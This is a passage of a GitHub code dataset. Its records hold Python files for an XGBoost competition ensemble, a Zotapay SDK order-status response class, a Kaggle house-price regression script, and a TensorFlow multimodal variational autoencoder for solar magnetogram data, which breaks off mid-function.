hand:')\nprint(hand)","repo_name":"ZiubinA/-Python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"8922916879","text":"# coding: utf-8\r\n__author__ = 'ZFTurbo: https://www.drivendata.org/users/ZFTurbo/'\r\n\r\n\r\nfrom operator import itemgetter\r\nfrom gbm_classifiers.a01_read_data import *\r\n\r\n\r\ndef create_feature_map(features):\r\n outfile = open('xgb.fmap', 'w')\r\n for i, feat in enumerate(features):\r\n outfile.write('{0}\\t{1}\\tq\\n'.format(i, feat))\r\n outfile.close()\r\n\r\n\r\ndef get_importance(gbm, features):\r\n create_feature_map(features)\r\n '''\r\n ‘weight’ - the number of times a feature is used to split the data across all trees.\r\n ‘gain’ - the average gain of the feature when it is used in trees\r\n ‘cover’ - the average coverage of the feature when it is used in trees\r\n '''\r\n importance = gbm.get_score(fmap='xgb.fmap', importance_type='weight')\r\n importance = sorted(importance.items(), key=itemgetter(1), reverse=True)\r\n return importance\r\n\r\n\r\ndef get_kfold_split(folds_number, len_train, target, random_state):\r\n train_index = list(range(len_train))\r\n folds = StratifiedKFold(n_splits=folds_number, shuffle=True, random_state=random_state)\r\n ret = []\r\n for n_fold, (trn_idx, val_idx) in enumerate(folds.split(train_index, target)):\r\n ret.append([trn_idx, val_idx])\r\n return ret\r\n\r\n\r\ndef create_xgboost_model(train, features, params):\r\n import xgboost as xgb\r\n import matplotlib.pyplot as plt\r\n print('XGBoost version: {}'.format(xgb.__version__))\r\n 
target_name = params['target']\r\n start_time = time.time()\r\n\r\n unique_target = np.array(sorted(train[target_name].unique()))\r\n print('Target length: {}: {}'.format(len(unique_target), unique_target))\r\n\r\n required_iterations = 13\r\n overall_train_predictions = np.zeros((len(train), len(unique_target)), dtype=np.float32)\r\n overall_importance = dict()\r\n\r\n model_list = []\r\n for iter1 in range(required_iterations):\r\n num_folds = 5\r\n max_depth = random.choice([3, 4, 5])\r\n eta = random.choice([0.08, 0.1, 0.2])\r\n\r\n subsample = random.choice([0.7, 0.8, 0.9, 0.95])\r\n colsample_bytree = random.choice([0.7, 0.8, 0.9, 0.95])\r\n eval_metric = random.choice(['mlogloss'])\r\n # eval_metric = random.choice(['logloss'])\r\n ret = get_kfold_split(num_folds, len(train), train[target_name].values, 720 + iter1)\r\n\r\n log_str = 'XGBoost iter {}. FOLDS: {} METRIC: {} ETA: {}, MAX_DEPTH: {}, SUBSAMPLE: {}, COLSAMPLE_BY_TREE: {}'.format(0,\r\n num_folds,\r\n eval_metric,\r\n eta,\r\n max_depth,\r\n subsample,\r\n colsample_bytree)\r\n print(log_str)\r\n params_xgb = {\r\n \"objective\": \"multi:softprob\",\r\n \"num_class\": 5,\r\n \"booster\": \"gbtree\",\r\n \"eval_metric\": eval_metric,\r\n \"eta\": eta,\r\n \"max_depth\": max_depth,\r\n \"subsample\": subsample,\r\n \"colsample_bytree\": colsample_bytree,\r\n \"silent\": 1,\r\n \"seed\": 2017 + iter1,\r\n \"nthread\": 6,\r\n \"gamma\": 0,\r\n \"tree_method\": 'exact',\r\n # 'gpu_id': 0,\r\n # \"tree_method\": 'gpu_hist',\r\n # 'updater': 'grow_gpu',\r\n }\r\n num_boost_round = 10000\r\n early_stopping_rounds = 50\r\n\r\n # print('Train shape:', train.shape)\r\n # print('Features:', features)\r\n\r\n full_single_preds = np.zeros((len(train), len(unique_target)), dtype=np.float32)\r\n fold_num = 0\r\n for train_index, valid_index in ret:\r\n fold_num += 1\r\n print('Start fold {}'.format(fold_num))\r\n X_train = train.loc[train_index].copy()\r\n X_valid = train.loc[valid_index].copy()\r\n y_train = X_train[target_name]\r\n y_valid = X_valid[target_name]\r\n\r\n print('Train data:', X_train.shape)\r\n print('Valid data:', X_valid.shape)\r\n\r\n # Exclude unverified from validation\r\n if 1:\r\n bad_ids = train[train['verified'] == False]['id'].values\r\n # condition = ~np.isin(train_ids, bad_ids)\r\n # train_ids = train_ids[condition]\r\n # train_answ = train_answ[condition]\r\n condition = ~np.isin(X_valid['id'], bad_ids)\r\n X_valid_excluded = X_valid[condition]\r\n y_valid_excluded = y_valid[condition]\r\n print('Exclude bad IDs from validation...')\r\n print('Valid data:', X_valid_excluded.shape)\r\n\r\n dtrain = xgb.DMatrix(X_train[features].values, y_train)\r\n dvalid = xgb.DMatrix(X_valid_excluded[features].values, y_valid_excluded)\r\n\r\n watchlist = [(dtrain, 'train'), (dvalid, 'eval')]\r\n gbm = xgb.train(params_xgb, dtrain, num_boost_round, evals=watchlist,\r\n early_stopping_rounds=early_stopping_rounds, verbose_eval=5)\r\n model_list.append(gbm)\r\n\r\n imp = get_importance(gbm, features)\r\n print('Importance: {}'.format(imp[:100]))\r\n for i in imp:\r\n if i[0] in overall_importance:\r\n overall_importance[i[0]] += i[1] / num_folds\r\n else:\r\n overall_importance[i[0]] = i[1] / num_folds\r\n\r\n print('Best iter: {}'.format(gbm.best_iteration + 1))\r\n pred = gbm.predict(xgb.DMatrix(X_valid[features].values), ntree_limit=gbm.best_iteration + 1)\r\n full_single_preds[valid_index] += pred.copy()\r\n\r\n pred = gbm.predict(dvalid, ntree_limit=gbm.best_iteration + 1)\r\n try:\r\n score = 
params['metric_function'](y_valid_excluded, pred)\r\n print('Fold {} score: {:.6f}'.format(fold_num, score))\r\n except Exception as e:\r\n print('Error:', e)\r\n\r\n print(train[target_name].values)\r\n print(full_single_preds)\r\n\r\n # Exclude unverified from validation\r\n if 1:\r\n bad_ids = train[train['verified'] == False]['id'].values\r\n # condition = ~np.isin(train_ids, bad_ids)\r\n # train_ids = train_ids[condition]\r\n # train_answ = train_answ[condition]\r\n condition = ~np.isin(train['id'], bad_ids)\r\n full_single_preds_excluded = full_single_preds[condition]\r\n target_excluded = train[condition][target_name].values\r\n print('Exclude bad IDs from validation...')\r\n print('Valid data:', X_valid_excluded.shape)\r\n\r\n score = params['metric_function'](target_excluded, full_single_preds_excluded)\r\n overall_train_predictions += full_single_preds\r\n print('Score iter {}: {:.6f} Time: {:.2f} sec'.format(iter1, score, time.time() - start_time))\r\n\r\n overall_train_predictions /= required_iterations\r\n for el in overall_importance:\r\n overall_importance[el] /= required_iterations\r\n imp = sort_dict_by_values(overall_importance)\r\n names = []\r\n values = []\r\n print('Total importance count: {}'.format(len(imp)))\r\n output_features = 100\r\n for i in range(min(output_features, len(imp))):\r\n print('{}: {:.6f}'.format(imp[i][0], imp[i][1]))\r\n names.append(imp[i][0])\r\n values.append(imp[i][1])\r\n\r\n if 0:\r\n fig, ax = plt.subplots(figsize=(10, 25))\r\n ax.barh(list(range(min(output_features, len(imp)))), values, 0.4, color='green', align='center')\r\n ax.set_yticks(list(range(min(output_features, len(imp)))))\r\n ax.set_yticklabels(names)\r\n ax.invert_yaxis()\r\n plt.subplots_adjust(left=0.47)\r\n plt.savefig('debug.png')\r\n\r\n # Exclude unverified from validation\r\n if 1:\r\n bad_ids = train[train['verified'] == False]['id'].values\r\n # condition = ~np.isin(train_ids, bad_ids)\r\n # train_ids = train_ids[condition]\r\n # train_answ = train_answ[condition]\r\n condition = ~np.isin(train['id'], bad_ids)\r\n overall_train_predictions_excluded = overall_train_predictions[condition]\r\n target_excluded = train[condition][target_name].values\r\n print('Exclude bad IDs from validation...')\r\n print('Valid data:', X_valid_excluded.shape)\r\n\r\n score = params['metric_function'](target_excluded, overall_train_predictions_excluded)\r\n print('Total score: {:.6f}'.format(score))\r\n\r\n return overall_train_predictions, score, model_list, imp\r\n\r\n\r\ndef predict_with_xgboost_model(test, features, model_list):\r\n import xgboost as xgb\r\n\r\n dtest = xgb.DMatrix(test[features].values)\r\n full_preds = []\r\n for m in model_list:\r\n preds = m.predict(dtest, ntree_limit=m.best_iteration + 1)\r\n full_preds.append(preds)\r\n preds = np.array(full_preds).mean(axis=0)\r\n return preds\r\n\r\n\r\nif __name__ == '__main__':\r\n start_time = time.time()\r\n gbm_type = 'XGB'\r\n params = get_params()\r\n target = params['target']\r\n id = params['id']\r\n metric = params['metric']\r\n\r\n train, test, features = read_input_data()\r\n print('Features: [{}] {}'.format(len(features), features))\r\n\r\n if 1:\r\n overall_train_predictions, score, model_list, importance = create_xgboost_model(train, features, params)\r\n prefix = '{}_{}_{}_{:.6f}'.format(gbm_type, len(model_list), metric, score)\r\n save_in_file((score, model_list, importance, overall_train_predictions), MODELS_PATH + prefix + '.pklz')\r\n else:\r\n prefix = 'XGB_5_auc_0.891512'\r\n score, model_list, 
importance, overall_train_predictions = load_from_file(MODELS_PATH + prefix + '.pklz')\r\n\r\n for i, c in enumerate(CLASSES):\r\n train[c] = overall_train_predictions[:, i]\r\n train[[id] + CLASSES].to_csv(SUBM_PATH + prefix + '_train.csv', index=False, float_format='%.8f')\r\n\r\n overall_test_predictions = predict_with_xgboost_model(test, features, model_list)\r\n\r\n # SAVE OOF FEATURES\r\n save_in_file(overall_train_predictions, FEATURES_PATH + 'oof/' + prefix + '_train.pklz')\r\n save_in_file(overall_test_predictions, FEATURES_PATH + 'oof/' + prefix + '_test.pklz')\r\n\r\n # CREATE SUBM\r\n for i, c in enumerate(CLASSES):\r\n test[c] = overall_test_predictions[:, i]\r\n sample = pd.read_csv(INPUT_PATH + 'submission_format.csv')\r\n test = pd.merge(sample[['id']], test, on='id', how='left')\r\n out_path = SUBM_PATH + prefix + '_ensemble_{}.csv'.format(len(features))\r\n out_path_1 = SUBM_PATH + 'xgboost_ensemble.csv'\r\n test[[id] + CLASSES].to_csv(out_path, index=False, float_format='%.8f')\r\n test[[id] + CLASSES].to_csv(out_path_1, index=False, float_format='%.8f')\r\n print(\"Elapsed time overall: %s seconds\" % (time.time() - start_time))\r\n\r\n\r\n'''\r\nDensenet121 (0.430336) + IRV2 (0.450813) + IRV2 (0.444538):\r\nScore iter 0: 0.399968 Time: 88.66 sec\r\nScore iter 2: 0.400587 Time: 316.98 sec\r\nTotal score: 0.394132 LB: 0.3700\r\n\r\nDensenet121 (0.430336) + IRV2 (0.450813) + IRV2 (0.444538) + EfficientNetB4 (0.431532):\r\nTotal score: 0.386864\r\n\r\nDensenet121 (0.430336) + IRV2 (0.450813) + IRV2 (0.444538) + EfficientNetB4 (0.431532) + DenseNet169 + New neighbours:\r\nTotal score: 0.373275\r\n\r\nPseudolabels (overfit)\r\nTotal score: 0.268235\r\n\r\nScore iter 0: 0.379637 Time: 70.15 sec - GPU\r\nTotal score: 0.370199 LB: 0.3639\r\n\r\nTotal score: 0.374172\r\n\r\nTotal score: 0.373778\r\n'''","repo_name":"drivendataorg/open-ai-caribbean","sub_path":"2nd Place/gbm_classifiers/r16_run_xgboost.py","file_name":"r16_run_xgboost.py","file_ext":"py","file_size_in_byte":11843,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"51"} +{"seq_id":"28885595225","text":"import json\nfrom zotapaysdk.helpers import HTTP_STATUS_OK\nfrom zotapaysdk.mg_requests.response import MGResponse\n\n\nclass MGOrderStatusResponse(MGResponse):\n class Fields:\n TYPE = \"type\"\n STATUS = \"status\"\n ERROR_MESSAGE = \"errorMessage\"\n PROCESSOR_TRANSACTION_ID = \"processorTransactionID\"\n ORDER_ID = \"orderID\"\n MERCHANT_ORDER_ID = \"merchantOrderID\"\n AMOUNT = \"amount\"\n CURRENCY = \"currency\"\n CUSTOMER_EMAIL = \"customerEmail\"\n CUSTOM_PARAM = \"customParam\"\n REQUEST = \"request\"\n MESSAGE = \"message\"\n DATA = \"data\"\n\n def __init__(self, http_response):\n \"\"\"\n Wrapper around the order status request response from the API.\n\n Args:\n http_response (requests.Response):\n \"\"\"\n super().__init__(http_response)\n\n self._type = None\n self._status = None\n self._error_message = None\n self._processor_transaction_id = None\n self._order_id = None\n self._merchant_order_id = None\n self._amount = None\n self._currency = None\n self._customer_email = None\n self._custom_param = None\n self._request = None\n\n parsed_response = json.loads(http_response.text)\n\n if http_response.status_code != HTTP_STATUS_OK:\n self._error_message = parsed_response.get(self.Fields.MESSAGE, \"Unavailable message\")\n else:\n parsed_response_data = parsed_response.get(self.Fields.DATA, None)\n self._type = parsed_response_data.get(self.Fields.TYPE, None)\n 
self._status = parsed_response_data.get(self.Fields.STATUS, None)\n self._processor_transaction_id = parsed_response_data.get(\n self.Fields.PROCESSOR_TRANSACTION_ID, None)\n self._order_id = parsed_response_data.get(self.Fields.ORDER_ID, None)\n self._merchant_order_id = parsed_response_data.get(self.Fields.MERCHANT_ORDER_ID, None)\n self._amount = parsed_response_data.get(self.Fields.AMOUNT, None)\n self._currency = parsed_response_data.get(self.Fields.CURRENCY, None)\n self._customer_email = parsed_response_data.get(self.Fields.CUSTOMER_EMAIL, None)\n self._custom_param = parsed_response_data.get(self.Fields.CUSTOM_PARAM, None)\n self._request = parsed_response_data.get(self.Fields.REQUEST, None)\n\n @property\n def type(self):\n \"\"\"\n Getter for the type.\n\n Returns:\n\n \"\"\"\n return self._type\n\n @property\n def status(self):\n \"\"\"\n Getter for the status.\n\n Returns:\n\n \"\"\"\n return self._status\n\n @property\n def error_message(self):\n \"\"\"\n Getter for the actual error message.\n\n Returns:\n\n \"\"\"\n return self._error_message\n\n @property\n def is_ok(self):\n \"\"\"\n Flag whether the request went ok or not.\n\n Returns: True if there is no error else False\n\n \"\"\"\n return self._error_message is None\n\n @property\n def processor_transaction_id(self):\n \"\"\"\n Getter for the processor transaction id.\n\n Returns:\n\n \"\"\"\n return self._processor_transaction_id\n\n @property\n def order_id(self):\n \"\"\"\n Getter for the order id.\n\n Returns:\n\n \"\"\"\n return self._order_id\n\n @property\n def merchant_order_id(self):\n \"\"\"\n Getter for the merchant order id.\n\n Returns:\n\n \"\"\"\n return self._merchant_order_id\n\n @property\n def amount(self):\n \"\"\"\n Getter for the amount.\n\n Returns:\n\n \"\"\"\n return self._amount\n\n @property\n def currency(self):\n \"\"\"\n Getter for the currency of the order.\n\n Returns:\n\n \"\"\"\n return self._currency\n\n @property\n def customer_email(self):\n \"\"\"\n Getter for the customer email.\n\n Returns:\n\n \"\"\"\n return self._customer_email\n\n @property\n def custom_param(self):\n \"\"\"\n Getter for the custom parameter passed to the api.\n\n Returns:\n\n \"\"\"\n return self._custom_param\n\n @property\n def request(self):\n \"\"\"\n Getter for the raw request as returned.\n\n Returns:\n\n \"\"\"\n return self._request\n","repo_name":"zotapay/python-sdk","sub_path":"zotapaysdk/mg_requests/order_status_response.py","file_name":"order_status_response.py","file_ext":"py","file_size_in_byte":4360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"21463059391","text":"import pandas as pd\r\nfrom sklearn.ensemble import RandomForestRegressor\r\nfrom sklearn.metrics import mean_absolute_error\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.tree import DecisionTreeRegressor\r\n\r\n#Path of the file to read\r\niowa_file_path = \"E://Job Search//Learning//Machine Learning//Kaggle//Sample House Prediction//train.csv\"\r\n\r\nhome_data = pd.read_csv(iowa_file_path)\r\n\r\n#Create target object \r\ny = home_data.SalePrice\r\n\r\n#List of features \r\nfeatures = ['LotArea', 'YearBuilt', '1stFlrSF', '2ndFlrSF', 'FullBath', 'BedroomAbvGr', 'TotRmsAbvGrd']\r\nX = home_data[features]\r\n\r\n#Split in to validation and training\r\ntrain_X, val_X, train_y, val_y = train_test_split(X, y, random_state =1)\r\n\r\n#Specify model\r\niowa_model = DecisionTreeRegressor(random_state=1)\r\n\r\n#Fit 
model\r\niowa_model.fit(train_X,train_y)\r\n\r\n#Make validation predictions and calculate mean absolute error\r\nval_predictions = iowa_model.predict(val_X)\r\nval_mae = mean_absolute_error(val_predictions, val_y)\r\nprint(f\"Validation MAE when not specifiying max_leaf_nodes: {val_mae}\")\r\n\r\n#using best value for max_leaf_nodes\r\ndef get_mae(max_leaf_nodes, train_X, val_X, train_y, val_y):\r\n\tmodel = DecisionTreeRegressor(max_leaf_nodes=max_leaf_nodes, random_state=1)\r\n\tmodel.fit(train_X, train_y)\r\n\tpred_val = model.predict(val_X)\r\n\tmae = mean_absolute_error(val_y, pred_val)\r\n\treturn mae\r\n\r\ncandidate_max_leaf_nodes = [5,25,50,100,250,500]\r\nscores = {i: get_mae(i,train_X,val_X,train_y,val_y) for i in candidate_max_leaf_nodes}\r\nbest_tree_size = min(scores,key=scores.get)\r\n\r\niowa_model = DecisionTreeRegressor(max_leaf_nodes=best_tree_size, random_state =1)\r\niowa_model.fit(train_X, train_y)\r\nval_predictions = iowa_model.predict(val_X)\r\nval_mae = mean_absolute_error(val_y, val_predictions)\r\nprint(f\"Validation MAE for Best Value of Leaf Nodes: : {val_mae}\")\r\n\r\n#Define the model for Random Forest\r\nrf_model = RandomForestRegressor(random_state=1)\r\nrf_model.fit(train_X,train_y)\r\nrf_val_predictions = rf_model.predict(val_X)\r\nrf_val_mae = mean_absolute_error(rf_val_predictions, val_y)\r\nprint(f\"Validation MAE for Random Forest Model: {rf_val_mae}\")\r\n\r\n#Random Forest on Full Data\r\nrf_model_full_data = RandomForestRegressor(random_state=1)\r\nrf_model_full_data.fit(X,y)\r\n\r\n#Apply above model on test data\r\n\r\ntest_data_path = \"E://Job Search//Learning//Machine Learning//Kaggle//Sample House Prediction//test.csv\"\r\ntest_data = pd.read_csv(test_data_path)\r\n\r\ntest_X = test_data[features]\r\ntest_preds = rf_model_full_data.predict(test_X)\r\n\r\noutput = pd.DataFrame({\"Id\": test_data.Id, \"SalePrice\": test_preds})\r\nprint(output)\r\noutput.to_csv(\"test1_output.csv\", index=False)","repo_name":"rohitharyani/Kaggle","sub_path":"Sample House Prediction/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":2661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"28263780158","text":"\nimport tensorflow as tf\nfrom tensorflow.keras.layers import Dense, Flatten, Reshape\nfrom tensorflow.keras.layers import Conv2D, Conv2DTranspose\nfrom tensorflow.keras.layers import MaxPooling2D, Bidirectional, LSTM, Masking, GRU, RepeatVector, TimeDistributed, Conv1D, GlobalMaxPooling1D\nfrom tensorflow.keras.activations import relu, softplus\nfrom tensorflow.keras import regularizers\nimport matplotlib.pyplot as plt\n\nclass model_rnn(tf.keras.Model):\n def __init__(self, cfg):\n super().__init__()\n \n self.cfg = cfg\n \n self.x_dim = self.cfg.x_dim\n self.x2_dim = self.cfg.x2_dim\n self.y_dim = self.cfg.y_dim\n \n self.x_enc_init()\n self.x_dec_init()\n self.x_img_enc_init()\n self.x_img_dec_init()\n self.x2_enc_init()\n self.x2_dec_init()\n self.y_dec_init()\n \n self.loss_y = tf.keras.losses.CategoricalCrossentropy(from_logits=True, reduction=tf.keras.losses.Reduction.NONE)\n self.loss_x = tf.keras.losses.MeanSquaredError(reduction=tf.keras.losses.Reduction.NONE)\n self.loss_x_img = tf.keras.losses.MeanSquaredError(reduction=tf.keras.losses.Reduction.NONE)\n self.loss_x2 = tf.keras.losses.MeanSquaredError(reduction=tf.keras.losses.Reduction.NONE)\n \n self.optimizer = tf.keras.optimizers.Adam(learning_rate=self.cfg.lr)\n \n class 
MyRegularizer(regularizers.Regularizer):\n\n def __init__(self, strength):\n self.strength = strength\n \n def __call__(self, x):\n return self.strength * tf.reduce_sum(tf.square(x))\n \n def x_enc_init(self):\n self.x_enc_hidden1 = LSTM(64, return_state=True)\n self.x_enc_hidden2 = LSTM(64, return_sequences=True)\n self.x_enc_pool = GlobalMaxPooling1D()\n self.x_enc_mean = Dense(self.cfg.z_dim)\n self.x_enc_var = Dense(self.cfg.z_dim)\n \n def x_dec_init(self):\n self.x_dec_rep = RepeatVector(self.x_dim[0])\n self.x_dec_hidden1 = LSTM(64, return_sequences=True)\n self.x_dec_hidden2 = Dense(64, activation='relu')\n self.x_dec_out = TimeDistributed(Dense(self.x_dim[1]))\n \n def x_img_enc_init(self):\n if self.cfg.network_type == 'recurrent':\n self.x_img_enc_conv1 = TimeDistributed(Conv2D(64, 3, (2,2), activation='relu', padding='same'))\n self.x_img_enc_conv2 = TimeDistributed(Conv2D(64, 3, (2,2), activation='relu', padding='same'))\n self.x_img_enc_flatten = TimeDistributed(Flatten())\n self.x_img_enc_hidden1 = LSTM(64, return_state=True)\n self.x_img_enc_hidden2 = LSTM(64, return_sequences=True)\n self.x_img_enc_pool = GlobalMaxPooling1D()\n elif self.cfg.network_type == 'dense':\n self.x_img_enc_conv1 = Conv2D(64, 3, (2,2), activation='relu', padding='same')\n self.x_img_enc_conv2 = Conv2D(64, 3, (2,2), activation='relu', padding='same')\n self.x_img_enc_flatten = Flatten()\n \n self.x_img_enc_mean = Dense(self.cfg.z_dim)\n self.x_img_enc_var = Dense(self.cfg.z_dim)\n def x_img_dec_init(self):\n self.x_img_dec_rep = RepeatVector(int(self.cfg.x_img_dim[0]/self.cfg.downsample_img)+1)\n self.x_img_dec_hidden1 = LSTM(64, return_sequences=True)\n if self.cfg.network_type == 'recurrent':\n self.x_img_dec_dense = TimeDistributed(Dense(int(self.cfg.x_img_dim[1]/4) * int(self.cfg.x_img_dim[2]/4) *64, activation='relu'))\n self.x_img_dec_conv1 = TimeDistributed(Conv2DTranspose(64, 3, 2, activation='relu', padding='same'))\n self.x_img_dec_conv2 = TimeDistributed(Conv2DTranspose(64, 3, 2, activation='relu', padding='same'))\n self.x_img_dec_conv3 = TimeDistributed(Conv2DTranspose(1, 3, 1, padding='same'))\n elif self.cfg.network_type == 'dense':\n self.x_img_dec_dense = Dense(int(self.cfg.x_img_dim[1]/4) * int(self.cfg.x_img_dim[2]/4) *64, activation='relu')\n self.x_img_dec_conv1 = Conv2DTranspose(64, 3, 2, activation='relu', padding='same')\n self.x_img_dec_conv2 = Conv2DTranspose(64, 3, 2, activation='relu', padding='same')\n self.x_img_dec_conv3 = Conv2DTranspose(1, 3, 1, padding='same')\n \n \n \n def x2_enc_init(self):\n self.x2_enc_hidden1 = LSTM(64, return_state=True) #batch_input_shape=(self.batch_size, self.x2_dim[0], self.x2_dim[1]))\n self.x2_enc_mean = Dense(self.cfg.z_dim)\n self.x2_enc_var = Dense(self.cfg.z_dim)\n def x2_dec_init(self):\n self.x2_dec_rep = RepeatVector(self.x2_dim[0])\n self.x2_dec_hidden1 = LSTM(64, return_sequences=True)\n self.x2_dec_hidden2 = Dense(64, activation='relu')\n self.x2_dec_out = TimeDistributed(Dense(self.x2_dim[1]))\n \n @tf.function\n def x_encode(self, x):\n if self.cfg.network_type == 'recurrent':\n zx = self.x_enc_hidden2(x)\n zx, h, c = self.x_enc_hidden1(zx)\n h = tf.concat([h, c], axis = -1)\n elif self.cfg.network_type == 'dense':\n h = x[:,-1,:]\n \n mean = self.x_enc_mean(h)\n logvar = self.x_enc_var(h)\n return mean, logvar\n @tf.function\n def x_decode(self, z):\n if self.cfg.network_type == 'recurrent':\n z = self.x_dec_rep(z)\n z = self.x_dec_hidden2(z)\n z = self.x_dec_hidden1(z)\n x = self.x_dec_out(z)\n elif self.cfg.network_type 
== 'dense':\n z = self.x_dec_rep(z)\n x = self.x_dec_out(z)\n \n return x\n \n \n @tf.function\n def x_img_encode(self, x):\n if self.cfg.network_type == 'recurrent':\n x = x[:, 0::self.cfg.downsample_img, :, :, :]\n h = self.x_img_enc_conv1(x)\n h = self.x_img_enc_conv2(h)\n h = self.x_img_enc_flatten(h)\n zx = self.x_img_enc_hidden2(h)\n zx, h, c = self.x_img_enc_hidden1(zx)\n h = tf.concat([h, c], axis = -1)\n elif self.cfg.network_type == 'dense':\n h = x[:,-1,:,:,:]\n h = self.x_img_enc_conv1(h)\n h = self.x_img_enc_conv2(h)\n h = self.x_img_enc_flatten(h)\n mean = self.x_img_enc_mean(h)\n logvar = self.x_img_enc_var(h)\n return mean, logvar\n @tf.function\n def x_img_decode(self, z):\n if self.cfg.network_type == 'recurrent':\n z = self.x_img_dec_rep(z)\n z = self.x_img_dec_hidden1(z)\n h = self.x_img_dec_dense(z)\n h = Reshape((-1, int(self.cfg.x_img_dim[1]/4) , int(self.cfg.x_img_dim[2]/4) , 64))(h)\n elif self.cfg.network_type == 'dense':\n h = self.x_img_dec_dense(z)\n h = Reshape((int(self.cfg.x_img_dim[1]/4) , int(self.cfg.x_img_dim[2]/4) , 64))(h)\n h = self.x_img_dec_conv1(h)\n h = self.x_img_dec_conv2(h)\n x = self.x_img_dec_conv3(h)\n return x\n \n @tf.function\n def x2_encode(self, x):\n if self.cfg.network_type == 'recurrent':\n zx, h, c = self.x2_enc_hidden1(x)\n h = tf.concat([h, c], axis = -1)\n elif self.cfg.network_type == 'dense':\n h = x[:,-1,:]\n mean = self.x2_enc_mean(h)\n logvar = self.x2_enc_var(h)\n return mean, logvar\n @tf.function\n def x2_decode(self, z):\n if self.cfg.network_type == 'recurrent':\n z = self.x2_dec_rep(z)\n z = self.x2_dec_hidden2(z)\n z = self.x2_dec_hidden1(z)\n x = self.x2_dec_out(z)\n elif self.cfg.network_type == 'dense':\n z = self.x2_dec_rep(z)\n x = self.x2_dec_out(z)\n return x\n \n \n def y_dec_init(self):\n self.y_dec1 = Dense(64, activation='relu')\n #self.y_dec2 = Dense(64, activation='relu')\n self.y_dec = Dense(self.y_dim)\n \n @tf.function\n def y_decode(self, z):\n #y = self.y_dec1(z)\n y = self.y_dec(z)\n return y\n \n @tf.function\n def kl_prior(self, mean, logvar, raxis=1):\n return -.5 * tf.reduce_sum( 1 + logvar - mean * mean - tf.exp(logvar) , axis=raxis)\n @tf.function\n def compute_kl(self, m_0, s_0, m_1, s_1):\n s_0 = tf.reshape(s_0, (-1, 1, self.cfg.z_dim))\n m_0 = tf.reshape(m_0, (-1, 1, self.cfg.z_dim))\n s_1 = tf.reshape(s_1, (1, -1, self.cfg.z_dim))\n m_1 = tf.reshape(m_1, (1, -1, self.cfg.z_dim))\n \n kl = tf.exp(s_0 - s_1)\n kl += s_1 - s_0\n kl += (m_1 - m_0) * (m_1 - m_0) * (1/tf.exp(s_1))\n kl = 0.5 * (tf.reduce_sum(kl, axis = -1) - self.cfg.z_dim)\n \n return kl\n \n @tf.function\n def reparameterize(self, mean, logvar):\n eps = tf.random.normal(shape=mean.shape)\n return eps * tf.exp(logvar * .5) + mean\n \n @tf.function\n def train_batch_classifier(self, data, train = True):\n \n with tf.GradientTape() as s_tape:\n loss_s, y_pred,_ = self.compute_loss(data, train = train)\n gradients = s_tape.gradient(loss_s, self.trainable_variables)\n \n self.optimizer.apply_gradients((grad, var) for (grad, var) in zip(gradients, self.trainable_variables) if grad is not None)\n \n return loss_s, y_pred\n \n @tf.function\n def compute_euc(self, m_0, m_1):\n \n m_0 = m_0 / tf.norm(m_0, axis = 1, keepdims = True)\n m_1 = m_1 / tf.norm(m_1, axis = 1, keepdims = True)\n \n m_0 = tf.reshape(m_0, (-1, 1, self.cfg.z_dim))\n m_1 = tf.reshape(m_1, (1, -1, self.cfg.z_dim))\n \n euc = (m_1 - m_0) * (m_1 - m_0)\n euc = tf.reduce_sum(euc, axis = -1) \n return euc\n \n @tf.function\n def compute_dot(self, m_0, m_1):\n m_0 = m_0 / 
tf.norm(m_0, axis = 1, keepdims = True)\n m_1 = m_1 / tf.norm(m_1, axis = 1, keepdims = True)\n return tf.matmul (m_0, tf.transpose(m_1))\n\n @tf.function\n def compute_loss(self, data, train = True):\n \n if not self.cfg.mdi_on and train:\n data = [data[i][0:16] for i in range(len(data))]\n \n y = data[0] # HMI Pars\n x = data[1] # HMI Image\n v = data[2] # MDI Pars\n r = data[4] # HMI Response\n mask = tf.cast(data[5], dtype = tf.float32)\n \n x = tf.expand_dims(x, -1)\n x = tf.image.per_image_standardization(x)\n n = r.shape[0]\n \n # Encoding\n mean_z = 0\n prec_z = 0\n if self.cfg.hmi_par_on:\n m_y, s_y = self.x_encode(y)\n prec_z += (1./tf.exp(s_y)) * mask[:,0:1] \n mean_z += m_y * (1./tf.exp(s_y)) * mask[:,0:1]\n if self.cfg.hmi_img_on:\n m_x, s_x = self.x_img_encode(x)\n prec_z += (1./tf.exp(s_x)) * mask[:,0:1] \n mean_z += m_x * (1./tf.exp(s_x)) * mask[:,0:1]\n if self.cfg.mdi_on:\n m_v, s_v = self.x2_encode(v)\n prec_z += (1./tf.exp(s_v)) * mask[:,1:2] \n mean_z += m_v * (1./tf.exp(s_v)) * mask[:,1:2] \n s_z = 1./prec_z\n m_z = mean_z * s_z\n s_z = tf.math.log(s_z)\n \n z = self.reparameterize(m_z, s_z)\n \n # Ranking\n \n loss_rank = 0\n if train:\n \n # HMI ranking\n dist = self.compute_euc(m_z[0:16], m_z[0:16])\n dist = tf.exp(-dist)\n \n sum_exp_negs = tf.reduce_sum(dist[0:8, 8:], axis = 1, keepdims=True)\n soft = dist[0:8, 0:8] / (dist[0:8, 0:8] + sum_exp_negs)\n soft = tf.linalg.set_diag(soft, tf.ones(soft.shape[0:-1]))\n loss_rank += tf.reduce_sum(-tf.math.log(soft))\n \n sum_exp_negs = tf.reduce_sum(dist[8:, 0:8], axis = 1, keepdims=True)\n soft = dist[8:, 8:] / (dist[8:, 8:] + sum_exp_negs)\n soft = tf.linalg.set_diag(soft, tf.ones(soft.shape[0:-1]))\n loss_rank += tf.reduce_sum(-tf.math.log(soft))\n \n # MDI ranking\n dist = self.compute_euc(m_z[16:32], m_z[16:32])\n dist = tf.exp(-dist)\n \n sum_exp_negs = tf.reduce_sum(dist[0:8, 8:], axis = 1, keepdims=True)\n soft = dist[0:8, 0:8] / (dist[0:8, 0:8] + sum_exp_negs)\n soft = tf.linalg.set_diag(soft, tf.ones(soft.shape[0:-1]))\n loss_rank += tf.reduce_sum(-tf.math.log(soft))\n \n sum_exp_negs = tf.reduce_sum(dist[8:, 0:8], 